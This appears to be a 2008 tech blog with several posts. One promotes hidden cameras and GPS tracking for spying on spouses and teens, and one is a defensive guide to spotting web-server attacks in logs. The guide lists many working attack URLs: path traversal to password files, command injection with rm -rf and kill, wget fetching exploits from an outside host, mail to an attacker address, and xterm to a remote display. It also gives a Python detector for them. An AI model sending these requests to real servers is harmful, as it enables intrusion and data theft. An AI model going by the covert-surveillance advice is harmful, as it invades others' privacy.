Weblog

Computer Technology
Computers and Technology

Spy Gear for Nanny Cams and Hidden Cameras


One of the main reasons for using a hidden camera or nanny cam is the protection of your children. However, there are many other reasons: to check on a cheating spouse, to keep an eye on your teenage children, or just to watch out for the security and safety of your home.

The hidden camera or nanny cam can be used for security reasons when you are away, have a house sitter, or have someone in your home doing repairs or house cleaning. A lot of people are even using hidden cameras and nanny cams in their vacation homes, in their businesses, and in nursing homes to watch over their parents and loved ones. You can even purchase a hidden camera or nanny camera with Internet access to watch your home or business when you are away.

A lot of businesses, such as doctors, lawyers, dentists and even hospitals, are using these hidden cameras to watch over their assets and places of business. Most daycare centers have some kind of hidden cameras or nanny cams so that parents can check up on and watch their children while they are at work. This makes leaving your child at daycare a little easier.

The nanny cams and hidden cameras are easy to install and use so that anyone can use them. They come in a variety of items such as wall clocks, boom boxes, cube clocks, plants and many more.

And yes, it is legal to use a hidden camera in all 50 states. However, it is illegal to record the audio speech of someone without their consent in the following 15 states: California, Connecticut, Delaware, Florida, Hawaii, Illinois, Louisiana, Maryland, Massachusetts, Montana, Nevada, New Hampshire, Oregon, Pennsylvania and Washington. These hidden cameras and nanny cams are very cost effective: for around $500.00 or a little more you can have peace of mind about your family, your home and your business.

Spy gear is now available in such a vast and wide variety that there is something for everyone. Even GPS units are great for keeping track of someone such as a cheating spouse, a teenage driver, or a child who leaves for the weekend with another parent or adult.


Posted by Computer Technology at 11/26/2008 10:53 AM

Why Cleanup Registry Issues?

During the normal course of operation, most people do not give much thought to their pc’s registry, let alone any of the inner workings of the computer. That everything works and works rapidly is significantly more important.

Normal operation, though, has an effect on pc performance. Over time, performance degrades and a pc optimizer is needed to provide a tune up of sorts to speed up pc operation.

What is the registry anyway?

The registry is part of a pc’s operating system. It is a directory that contains system settings and options.

When functioning properly, directions from the registry are rapidly conveyed to the CPU as part of normal operation. When issues arise in the registry, however, pc performance degrades significantly, causing it to slow down noticeably. In order to reverse the problem and optimize pc performance when this happens, it is necessary to clean up registry issues thoroughly.

How do registry issues start in the first place?

Normal wear and tear on any machine takes a toll, and computers are no exception. Every time new hardware is added to your system, the registry is updated. Every time software is installed or uploaded, the registry is updated. Files downloaded from the Internet, configuration changes to software applications or hardware have the same effect. These changes are not always compatible and not always cleanly done.

The only way to clear out incompatibilities, file corruption or extraneous data and optimize pc performance is to cleanup registry contents.

When is it time to cleanup registry issues?

There are a few common symptoms that indicate it’s time to cleanup registry problems. Some common issues are:

• Software freezing up
• Software that doesn’t load
• Significantly slowed operation
• System crash
• Frequent system errors


How can a registry get cleaned out?

It’s not necessary to be a computer expert to fix registry issues. On the contrary, registry cleaning software automates and greatly simplifies the process. In fact, the best registry cleaners actually act as a pc optimizer. Most programs back up your system settings, scan for problems and then repair them. The best registry cleaners, though, offer even more functionalities that help speed up pc performance. These features can include disc defragmentation and selectively removing applications from system startup, both of which result in noticeable improvements in performance.


Posted by Computer Technology at 11/26/2008 10:51 AM

HCL Laptops--The gadgets which bring the world at your feet

Laptops have made our work much simpler than it was, because with a personal computer one has to sit in front of it and it needs a supply of electricity. With a laptop, you do not have to wait for electricity; just charge it once and you can use it for the whole day. HCL Laptops come with advanced features, which allow the user to work on them freely without any trouble.

HCL laptops are devices that the user can easily carry with him. Nowadays HCL laptops come in many varieties, which allow users to make their work as simple as it can be. Laptops are the best way for the user to work outside his office or room. These days, laptops offer a higher degree of flexibility, more features and more value than a traditional personal computer.

In modern days, laptops have become very popular among the new generation because they save time and are easy to carry anywhere with you. In the present scenario, cheap laptops of good quality are also available. Laptops are easy to carry because they weigh only 1 to 8 kilograms.

Laptops are available in many varieties, cheap as well as higher quality. There are also other branded laptops, which are easy to handle and let the user work on them while busy with other tasks. HCL, SONY and DELL are some of the best branded companies whose laptops are popular all over the country. HCL Laptops are available in small as well as bigger sizes; it depends on which the user prefers. To collect more information about laptops, consumers are free to search on websites. On the Internet there are various websites which will provide you with full information about laptops.

Posted by Computer Technology at 11/26/2008 10:50 AM

Handling a virus that cannot be removed

With broadband now popular, a lot of friends like to leave their computers on 24 hours a day for the convenience of BT downloads. Being online around the clock makes it much easier for viruses and Trojan horses to "invade" the system: they break into our computers in the middle of the night and do all kinds of damage. Some time ago I helped a friend clean a virus and came across one that "could not be removed". I share the experience of killing it below.

1. Jingxian virus. My friend's computer runs Windows XP Professional and had recently often been left on overnight for BT movie downloads. Unexpectedly, at one boot Norton reported a virus in "exporer.exe". A Norton scan could find the virus, but Norton reported that it could not quarantine or remove the virus file.

2. Killing. In general, if a virus file cannot be deleted directly, it is mostly because the virus process is still running. I opened Task Manager, found the virus process "exporer.exe" and terminated it successfully. Following the file path that Norton reported, I located the virus file, held down the Shift key, right-clicked it and selected "Delete". Strangely, the system would not delete the file. I opened Task Manager again and confirmed that the virus process had been terminated, and the file was not write-protected, so why could it not be deleted? I tried deleting the folder instead, but the system refused that as well, and restarting the computer several times gave the same result.

Later I opened the properties of "exporer.exe" (to look at the file's creation date and size, so that I could search for other files belonging to the virus) and happened to notice the "Security" tab in the properties window. Selecting the user showed that, in the permissions list, the Deny box for "Special Permissions" was checked. Could the file's permissions be the reason it could not be removed? I clicked the "Advanced" button and saw a "Deny Delete" entry in the window that opened. Clicking "Edit" finally showed the real reason the file could not be deleted: the virus had set the current user's Delete permission to Deny while still allowing "Read & Execute". I cancelled the Deny entry, returned to the file properties window, checked Allow for "Full Control" and clicked "OK". After that, "exporer.exe" was deleted successfully.

Tips

The "Security" tab in file (folder) properties exists only on NTFS partitions. If you do not see the tab, open My Computer, click "Tools → Folder Options → View", and under Advanced Settings remove the check mark in front of "simple file sharing (Recommended)".

After deleting "exporer.exe" I tried to delete its folder, and the system refused again. The folder's "Security" properties showed that the same delete permissions ("Delete Subfolders and Files" and "Delete") had been denied. As before, once the restrictions were removed the virus was wiped out completely. In general, when an operation on a file (folder) is refused because of permissions, setting the permissions to "Full Control" resolves it.

Tips

(1) Permissions can be inherited. Sometimes when you open a file's Security tab, the "Deny Delete" entry shown in Figure 4 may not be there, but if the parent folder is set to deny "Delete Subfolders and Files", the file still cannot be removed. The solution is to set the file's permissions to Full Control.

(2) File permissions are tied to the file owner. On an office computer with several accounts, someone with ulterior motives may tie a Trojan to one particular user (a lower-privileged account whose user is less vigilant, which makes stealing information easier). If you find that a Trojan is associated with a particular account, that is, the Trojan runs after some users log on but not after others (with the Trojan file's permissions set to allow Read and deny Delete), log on as an administrator, force the owner of the Trojan file to be changed to the current user, then set Full Control and delete the Trojan.

(3) A little experience. File (folder) permissions are a distinctive feature of Windows XP/2000 that allows different permissions to be set flexibly for different users. Some Trojan and virus authors set their program files to allow "Read & Execute" and deny "Delete" in order to achieve better "self-protection". Because changing file permissions is a fairly complex operation, it is generally done by an attacker working on the host by hand. Friends who like to leave their machines running around the clock should install a good firewall and shut down unnecessary ports, which effectively prevents this kind of attack from recurring. If a virus cannot be removed even after its process has been terminated, check whether the file permissions have been changed.


Posted by Computer Technology at 11/16/2008 6:34 AM

Attack traces on the port 80 web service

By: 73zz.com
The web service's default port 80 is the subject of a steady stream of security issues, and some vulnerabilities even allow an attacker to gain system administrator access to a site. The following is Zenomorph's research on the traces that attacks against port 80 leave behind, and on how to spot problems from your logs.
[Detailed description]
The examples below show attacks against web servers and commonly used web applications, and the traces they leave. They represent only the main attack methods and do not list every form of attack. Each part describes one kind of attack in detail and how such vulnerabilities are used to carry it out.

(1) "." ".." and "..." requests
Traces of these attacks are very common for web applications and web servers. They allow an attacker or a worm to change directories on the web server and reach areas that are not public. Most vulnerabilities in CGI programs involve ".." requests.
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
This example shows the attacker requesting the motd file. If the attacker is able to break out of the web server's root directory, he can get more information and may obtain additional privileges.

(2) "%20" request
%20 is the hexadecimal value of a space. Its presence does not by itself mean anything is wrong, but you will find it when you view your logs, because a number of applications running on web servers use this character in valid requests. You should therefore check the logs carefully. On the other hand, this request is sometimes used to help execute commands.
Example:
http://host/cgi-bin/lame.cgi?page=ls%20-al|
This example shows the attacker running a unix command that lists the files in a directory. This can give the attacker access to your important system files and help him work out how to gain further privileges.

(3) "" request
This is the hexadecimal value of a byte that can be used to fool web applications into requesting different types of files.
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
This may be a valid request on this machine. If the attacker notices that this request succeeds, he will probe the cgi program.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
The cgi program may not accept this request because it checks the suffix of the requested file, such as .html, .shtml or other file types. Most programs will report that the requested file type is invalid, and in doing so they tell the attacker that the requested file must end in a particular suffix. This lets the attacker learn system paths and file names, and then more sensitive information about your system.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motdhtml
Note this request: it tricks the cgi program into treating the file as an acceptable type. Some applications validate the requested file so poorly that this works, which is why attackers commonly use it.

(4) "|" request
This is the pipe character. On unix systems it is used to run several commands in a single request.
Example:
# cat access_log | grep -F ".."
(This command shows the ".." requests in the log, which is commonly used to find attacks and worm activity.)
You will often see legitimate web applications using this character, which leads to false alarms in IDS logs.
Examining your applications carefully is worthwhile, because it reduces false alarms from the intrusion detection system.
Some examples are given below:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|
This request runs the ls command. Some variations follow:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc|
This request lists all files in the /etc directory of a unix system.
http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20"lame"
This request runs the cat command followed by the grep command, searching for "lame".

(5) ";" request
On unix systems, this character allows several commands to be run on one line.
Example:
# id; uname -a
(Runs the id command, followed by the uname command.)
Some web programs use this character, which may cause false alarms in your IDS logs. Check your web programs carefully so that your IDS produces fewer false alarms.

(6) "<" and ">" requests
You should check your logs for these two characters for a number of reasons. First and foremost, ">>" is used to append data to a file.
Example 1:
# echo "your hax0red h0 h0" >> /etc/motd (This request writes the message to the motd file.)
An attacker can easily use a request like the one above to tamper with your web pages. For example, attackers often used the well-known RDS exploit to change web pages.
Example 2:
http://host/something.php=Hi%20mom%20Im%20Bold!
You will notice that HTML tags use the same "<" and ">" characters. This kind of attack does not give the attacker access to the system; it confuses people into thinking that the content is legitimate information from the web site (the victim has to visit a link set up by the attacker). Such requests may be converted into hexadecimal-encoded characters so that the attack traces are less obvious.

(7) "!" request
This character is commonly used in SSI (Server Side Include) attacks. As above, the attacker can confuse a user who clicks on a link the attacker has set up.
Example:
http://host1/something.php ="-->
In this example the attacker could make a document from host2 appear to come from host1. (Of course, the visitor needs to follow the link set up by the attacker. Such a request could be disguised with hexadecimal encoding, making it hard to find.)
This method can also be used to run commands with the privileges of the web site user.
Example:
http://host/something.php ="-->
This example runs the "id" command on the remote system, which shows the user id of the web site, usually "nobody" or "www".
This form can also be used to include hidden files.
Example:
http://host/something.php ="-->
Hidden .htpasswd files are normally not displayed, because Apache has a rule that refuses requests for files beginning with .ht. The SSI tag bypasses this restriction and leads to security problems.

(8) "
In some simple php applications, this may allow commands to be run on the remote system with the privileges of the web site user.

(9) "`" request
This character is commonly used in perl to execute commands. It is not often used in web applications, so if you see it in your logs you should take it very seriously.
Example:
http://host/something.cgi=`id`
A badly written perl cgi program would execute the id command.
[More]
The following part discusses the commands an attacker is likely to execute and the files he is likely to request, and how to check whether you have a remote command execution flaw. It is meant to give you a good idea of what is happening to your system and what the traces of an attempted attack look like; it does not list every command and request an attacker may use.
"/bin/ls"
This is the full path of the ls command, and many web application vulnerabilities involve it. If you see this request in many places in your logs, there is a good chance of a remote command execution vulnerability, though it is not necessarily a problem and may be a false alarm. Once again, as a reminder: how your web applications (cgi, asp, php, etc.) are written is the basis of their security.
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|
http://host/cgi-bin/bad.cgi?doh=ls%20-al;
"cmd.exe"
This is the Windows shell. If an attacker can access and run it, he can do anything on the Windows machine that the server's permissions allow. Many worms spread to remote machines through port 80 in this way.
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/bin/id"
This is a binary file. As with /bin/ls, if you see this request in many places in your logs, there is a good chance of a remote command execution vulnerability, though it is not necessarily a problem and may be a false alarm.
It shows which user you are and which groups you belong to.
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
"/bin/rm"
This command deletes files and is very dangerous if used improperly.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
"wget" and "tftp" commands
Attackers often use these commands to download additional files that help them gain further privileges. wget is a unix command that may be used to download a backdoor program. tftp is a unix and NT command used to download files. A number of IIS worms used tftp to copy themselves to other hosts.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c|
http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c;
"cat" command
This command displays the contents of files. It can be used to read important information such as configuration files, password files, credit card files and anything else you can think of.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd|
http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
"echo" command
This command is commonly used to write data to a file, such as "index.html".
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt|
http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt;
"ps" command
This command lists the currently running processes. It tells the attacker what software the remote host is running, which gives him ideas about security issues he can use to gain further privileges.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux|
http://host/cgi-bin/bad.cgi?doh=ps%20-aux;
"kill" and "killall" commands
These commands kill processes on unix systems. An attacker can use them to stop system services and programs, and also to clean up traces of the attack; some exploits leave a lot of child processes behind.
Examples:
http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200|
http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;
"uname" command
This command tells the attacker the hostname of the remote machine. Sometimes a web site is hosted at an isp, and the command is used to find out which isp it is located at, perhaps one the attacker has visited before. Usually uname -a is requested, and it will be recorded in the log file.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a|
http://host/cgi-bin/bad.cgi?doh=uname%20-a;
"cc, gcc, perl, python, etc..." compiler/interpreter commands
The attacker downloads an exploit with wget or tftp and uses cc or gcc to compile it into an executable program in order to gain further privileges.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c|
http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337;
If you find "perl" or "python" in your logs, a remote attacker may have downloaded a perl or python script and tried to gain local privileges.
"mail" command
Attackers usually use this command to send important files to their own mailbox, and may also use it for e-mail bomb attacks.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@fuckcnhonker.org%20
"xterm / other X applications" commands
xterm is often used to obtain a shell on a remote machine. If you find it in your logs, analyze it carefully: your system may already have suffered a security breach. Watch the logs for the string "%20-display%20", which usually marks an attempt to start xterm or another X application on the remote machine.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm%20-display%20192.168.22.1|
http://host/cgi-bin/bad.cgi?doh=Xeyes%20-display%20192.168.22.1;
"chown, chmod, chgrp, chsh, etc..." commands
These commands change permissions on unix systems:
chown = sets the owner of a file
chmod = sets file permissions
chgrp = changes the group ownership of a file
chsh = changes the shell a user uses
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20index.html|
http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html;
http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd|
http://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh;
http://host/cgi-bin/bad.cgi?doh=../../../../bin/chgrp%20nobody%20/etc/shadow|
"/etc/passwd" file
This is the system password file. It is usually shadowed and does not let you see the encrypted passwords, but it still tells the attacker the valid user names, the absolute paths on the system, the sites hosted and other information. Because the file is usually shadowed, an attacker will usually look at the /etc/shadow file as well.
"/etc/master.passwd"
This is the password file on BSD systems and contains the encrypted passwords. The file is readable only by the root account, but an unskilled attacker may try to open and read it anyway. If the web site runs with root privileges, the attacker will be able to read it, and a lot of problems for the system administrator will follow.
"/etc/shadow"
Contains the encrypted system passwords. Like /etc/master.passwd, it is readable only by the root account.
"/etc/motd"
This "Message of the Day" file holds the message shown to a user who logs in to a unix system. It provides important information that the system administrator wants users to see, and it may also contain the system's version information. An attacker usually views this file to learn what system is running; the next step is to search for exploits for that type of system and gain further privileges.
"/etc/hosts"
This file provides information about ip addresses and the network. An attacker can use it to learn more about the system's network setup.
"/usr/local/apache/conf/httpd.conf"
This is the Apache web server configuration file. From it, an attacker can learn things such as whether cgi and ssi are available.
"/etc/inetd.conf"
This is the configuration file of the inetd service. From it, an attacker can learn which services the remote machine starts and whether a wrapper is used for access control. If a wrapper is running, the attacker will next inspect "/etc/hosts.allow" and "/etc/hosts.deny", and may change some of the settings in them to gain privileges.
".htpasswd, .htaccess, and .htgroup"
These files are usually used for user authentication on a web site. An attacker will try to view them to obtain user names and passwords. The passwords in the .htpasswd file are encrypted, but they can be recovered with simple password cracking programs, which gives the attacker access to the protected areas of the site (users often use the same user name and password elsewhere, so the attacker may gain access to other accounts as well).
"access_log and error_log"
These are the apache server's log files. An attacker will often look at them to see which of his own requests, and which requests from other people, were recorded.
Typically, the attacker will modify these log files, for example to remove his own address. If attackers break into your system through port 80 and you have no backups and no other logging of system state, intrusion detection becomes very difficult.
"[drive-letter]:\winnt\repair\sam._ or [drive-letter]:\winnt\repair\sam"
This is the Windows NT password file. If remote command execution is not possible, the attacker will usually request this file and then crack it with a password cracking tool such as "l0pht crack". If the attacker succeeds in cracking the administrator password, the remote machine is under the attacker's control.
[Overflow analysis]
I will not say too much about buffer overflows in this article, but I will show the signs that deserve special attention. Buffer overflow attacks are often obscured through encoding and other means, which makes them hard to find.
The following is a simple example.
Example: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
This example shows the attacker sending a large number of A characters to an application to test it for a buffer overflow. A buffer overflow can give the attacker remote command execution. If the program is setuid and owned by root, an overflow can give access to the whole system; if the program is not setuid, the overflow only yields the privileges of the web site user.
Not every case can be covered here, but you should check your log files regularly. If one day you suddenly find many requests that do not look like your usual requests, you may be under an overflow attack, or it may be a new Internet worm.
[Code conversion]
Attackers know that IDS systems usually check requests mechanically against fixed rules. An attacker will therefore often use an encoding tool to convert the request into hexadecimal format, causing the IDS to ignore it. The well-known CGI vulnerability scanner Whisker is a very good example. If your logs show a lot of hexadecimal and unusual characters, an attacker may be trying to attack your system in one of these ways.
A quick way to check is to copy the hexadecimal request from your log file into your browser; the browser converts it to the real request and shows what was requested. If you do not want to run that risk, a simple "man ascii" gives you the correct codes.
[Conclusion]
This article cannot cover every attack against port 80, but it lists the most common ones and shows you how to check your log files and which rules you might add to your IDS. It was written to give web administrators a good idea of what to look out for, and I hope it will also help web developers write better web programs.
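The log checks described in this article, combined with the decoding step from the [Code conversion] section, as an added example that is not part of the original article. The signature names, the 256-character parameter threshold and the sample log lines are constructed assumptions; ";" and "|" are reported only alongside a stronger indicator, because the article notes that legitimate applications use them too.

```python
import re
import string
from urllib.parse import unquote

# (name, pattern, noisy). Patterns follow the article's list; names are this example's own.
# "noisy" marks characters the article says valid applications also use.
SIGNATURES = [
    ("dir-traversal", re.compile(r"\.\./"), False),
    ("command-path", re.compile(
        r"/bin/(?:ls|id|rm|cat|echo|ps|kill|uname|cc|mail|chmod|chown|chgrp)\b|cmd\.exe",
        re.I), False),
    ("download-tool", re.compile(r"\b(?:wget|tftp)\b", re.I), False),
    ("sensitive-file", re.compile(
        r"/etc/(?:passwd|shadow|master\.passwd|motd|hosts|inetd\.conf)"
        r"|\.ht(?:passwd|access|group)|httpd\.conf", re.I), False),
    ("x-display", re.compile(r" -display "), False),
    ("angle-bracket", re.compile(r"[<>]"), False),
    ("backtick", re.compile(r"`"), False),
    ("pipe", re.compile(r"\|"), True),
    ("semicolon", re.compile(r";"), True),
]
NOISY = {name for name, _, noisy in SIGNATURES if noisy}
MAX_PARAM_LEN = 256  # assumed threshold for the overflow check; tune to your own traffic
UNRESERVED = set(string.ascii_letters + string.digits + "-._~")
LOG_RX = re.compile(  # Apache common log format
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<target>.*) HTTP/\d\.\d" (?P<status>\d{3})\b')


def normalize(target, max_rounds=3):
    """Percent-decode until the text stops changing, so escapes cannot hide a signature."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def encodes_unreserved(raw):
    """True if letters, digits or -._~ were percent-encoded; normal clients never need to."""
    return any(chr(int(h, 16)) in UNRESERVED
               for h in re.findall(r"%([0-9A-Fa-f]{2})", raw))


def scan_line(line):
    """Return a finding dict for one access_log line, or None if nothing stands out."""
    m = LOG_RX.match(line)
    if not m:
        return None
    raw = m.group("target")
    decoded = normalize(raw)
    hits = [name for name, rx, _ in SIGNATURES if rx.search(decoded)]
    if encodes_unreserved(raw):
        hits.append("hex-obfuscation")
    query = decoded.partition("?")[2]
    if any(len(param) > MAX_PARAM_LEN for param in query.split("&")):
        hits.append("long-parameter")
    if not any(h not in NOISY for h in hits):
        return None  # only ';' or '|' seen: too common to report alone
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "request": decoded[:120], "hits": hits}


def scan(lines):
    return [f for f in map(scan_line, lines) if f]


# Constructed sample input (documentation IP ranges), not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Nov/2008:05:10:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.44 - - [15/Nov/2008:05:10:07 +0000] '
    '"GET /cgi-bin/lame.cgi?file=../../../../etc/motd HTTP/1.0" 404 291',
    '198.51.100.7 - - [15/Nov/2008:05:11:30 +0000] '
    '"GET /cgi-bin/bad.cgi?doh=%2e%2e/%2e%2e/bin/id%7c HTTP/1.0" 200 57',
    '192.0.2.10 - - [15/Nov/2008:05:12:02 +0000] "GET /search.cgi?q=a;b HTTP/1.0" 200 512',
    '198.51.100.7 - - [15/Nov/2008:05:12:40 +0000] '
    '"GET /cgi-bin/helloworld?type=' + "A" * 600 + ' HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["status"], ",".join(finding["hits"]), finding["request"])
```

A flagged request that returned status 200 deserves a look before one that returned 404, since the server did not reject it.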


Posted by Computer Technology at 11/15/2008 5:15 AM